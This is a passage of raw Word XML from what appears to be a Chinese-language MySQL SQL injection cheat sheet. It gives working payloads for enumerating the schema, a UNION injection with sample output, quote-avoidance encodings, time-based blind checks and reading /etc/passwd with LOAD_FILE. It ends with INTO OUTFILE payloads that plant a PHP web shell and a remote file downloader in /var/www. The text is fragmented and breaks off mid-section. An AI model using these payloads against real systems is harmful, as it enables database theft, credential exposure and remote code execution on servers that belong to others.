          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="21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Output：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&gt;CHARACTER_SETS &gt; CHARACTER_SET_NAME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&gt;CHARACTER_SETS &gt; DEFAULT_COLLATE_NAME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&gt;CHARACTER_SETS &gt; DESCRIPTION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&gt;CHARACTER_SETS &gt; MAXLEN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&gt;COLLATIONS &gt; COLLATION_NAME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&gt;COLLATIONS &gt; CHARACTER_SET_NAME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&gt;COLLATIONS &gt; ID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&gt;COLLATIONS &gt; IS_DEFAULT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proofErr w:type="gramStart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[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information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] &gt;COLLATIONS &gt; IS_COMPILED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widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="3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 xml:space="preserve">SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, 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table_name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 xml:space="preserve">, 0x3c62723e, 0x436f6c756d6e3a20, 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column_name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 xml:space="preserve"> ORDER BY (SELECT version FROM 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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">) SEPARATOR 0x3c62723e),1,1024) FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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19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username FROM Users WHERE id = '-1' UNION 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 xml:space="preserve">MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, 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table_name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 xml:space="preserve">, 0x3c62723e, 0x436f6c756d6e3a20, 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column_name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 xml:space="preserve"> ORDER BY (SELECT version FROM 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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve">) SEPARATOR 0x3c62723e),1,1024) FROM </w:t>
      </w:r>
      <w:proofErr w:type="spell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information_schema.columns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--+';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Output：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 xml:space="preserve">Table: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talk_revisions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Column: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revid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Table: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talk_revisions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Column: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userid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Table: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talk_revisions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lastRenderedPageBreak/>
        <w:t>Column: user</w:t>
      </w:r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 xml:space="preserve">Table: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>talk_projects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Column: priority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2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4" w:name="_Toc32209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从列名查找表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34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84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8"/>
        <w:gridCol w:w="2288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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SELECT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WHERE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= 'username';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="228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查找任何名为username的列的表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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SELECT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WHERE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LIKE '%user%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="228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查找包含单词user的任何列的表名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2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5" w:name="_Toc5264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从表名中查找列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35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84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8"/>
        <w:gridCol w:w="2288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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SELECT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WHERE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= 'Users';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="228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查找Users表的列</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616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SELECT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column_name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information_schema.columns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WHERE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table_name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LIKE '%user%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="228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查找包含单词user的任何表的列名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12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36" w:name="_Toc20827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查找当前查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36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8191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3"/>
        <w:gridCol w:w="3018"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="517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SELECT info FROM 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information_schema.processlist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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可从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MySQL 5.1.7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开始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pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc7275_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十．避免引用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37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tbl>
      <w:tblPr>
        <w:tblW w:w="82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3"/>
        <w:gridCol w:w="1230"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="697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SELECT * FROM Users WHERE username = 0x61646D696E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十六进制编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6973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SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="123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CHAR()函数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</w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc8054_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>十一．字符串连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38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tbl>
      <w:tblPr>
        <w:tblW w:w="5011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C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="501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SELECT 'a' 'd' 'mi' 'n';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="501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SELECT CONCAT('a', 'd', 'm', 'i', 'n');</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="501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SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="501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SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');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CONCAT()如果它的任何论证都是空的，它将返回空。代替使用CONCAT_WS().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39" w:name="_Toc22994_WPSOffice_Level2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第一个论点CONCAT_WS()为其余参数定义分隔符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39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40" w:name="_Toc4878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/*</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/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CONCAT(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str1,str2,...)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返回来自于参数连结的字符串。如果任何参数是NULL，返回NULL。可以有超过2个的参数。一个数字参数被变换为等价的字符串形式。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&gt; select CONCAT('My', 'S', 'QL');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-&gt; 'MySQL'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&gt; select CONCAT('My', NULL, 'QL');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-&gt; NULL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&gt; select CONCAT(14.3);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-&gt; '14.3'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如：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update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test set ID=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concat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(ID,'ABC');</w:t>
      </w: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41" w:name="_Toc10762_WPSOffice_Level1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放在前面就连接到前面，放在后面就连接在后面</w:t>
      </w:r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。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/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42" w:name="_Toc6138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*/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42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43" w:name="_Toc23793_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十二．条件语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10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</w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="101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CASE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="101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IF()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="101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IFNULL()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="101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NULLIF(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20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IF(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1=1, true, false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2F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30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CASE WHEN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1=1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THEN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true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ELSE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false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END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44" w:name="_Toc11111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lastRenderedPageBreak/>
        <w:t>/*</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/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expr1,expr2,expr3)  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如果 expr1 是TRUE (expr1 &lt;&gt; 0 and expr1 &lt;&gt; NULL)，则 IF()的返回值为expr2; 否则返回值则为 expr3。IF() 的返回值为数字值或字符串值，具体情况视其所在语境而定。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IFNULL(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expr1,expr2)</w:t>
      </w:r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假如expr1 不为 NULL，则 IFNULL() 的返回值为 expr1; 否则其返回值为 expr2。IFNULL()的返回值是数字或是字符串，具体情况取决于其所使用的语境。</w:t>
      </w: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45" w:name="_Toc19169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*/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45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</w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc25359_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十三．计时</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46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tbl>
      <w:tblPr>
        <w:tblW w:w="22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960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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SLEEP()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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MySQL 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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BENCHMARK()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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MySQL 4/5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' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '</w:t>
      </w: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 w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc12577_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十四．特权</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47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文件特权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以下查询可帮助确定给定用户的文件权限。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="899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1"/>
        <w:gridCol w:w="692"/>
        <w:gridCol w:w="1145"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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SELECT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file_priv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mysql.user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WHERE user = 'username';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="692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需要根特权</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="114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MySQL 4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7161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SELECT grantee,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is_grantable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information_schema.user_privileges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WHERE </w:t>
            </w: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privilege_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> = 'file' AND grantee like '%username%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="692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不需要特权</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="114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  <w:t>MySQL 5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 w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc21447_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>十五．读取文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48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如果用户拥有文件权限，则可以读取文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc32276_WPSOffice_Level2"/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LOAD_FILE()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49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22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LOAD_FILE(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'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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etc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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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passwd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'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2F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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LOAD_FILE(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0x2F6574632F706173737764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文件必须位于服务器主机上。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load_file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()的基目录是 @@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datadir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 .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MySQL用户必须读取该文件。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文件大小必须小于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max_LEXED_PACKET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。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@@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max_allowed_packet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默认大小是1047552字节。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50" w:name="_Toc4917_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六．书写文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50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如果用户拥有文件权限，则可以创建文件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widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc10701_WPSOffice_Level2"/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INTO OUTFILE/DUMPFILE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若要编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，请执行以下操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT '&lt;? system($_GET[\'c\']); ?&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"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color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>INTO OUTFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"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color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://localhost/shell.php?c=cat%20/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
        <w:t>编写下载程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT '&lt;? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>fwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">($_GET[f], \'w\'), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>file_get_contents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>($_GET[u])); ?&gt;' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>INTO OUTFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>get.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="-330" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
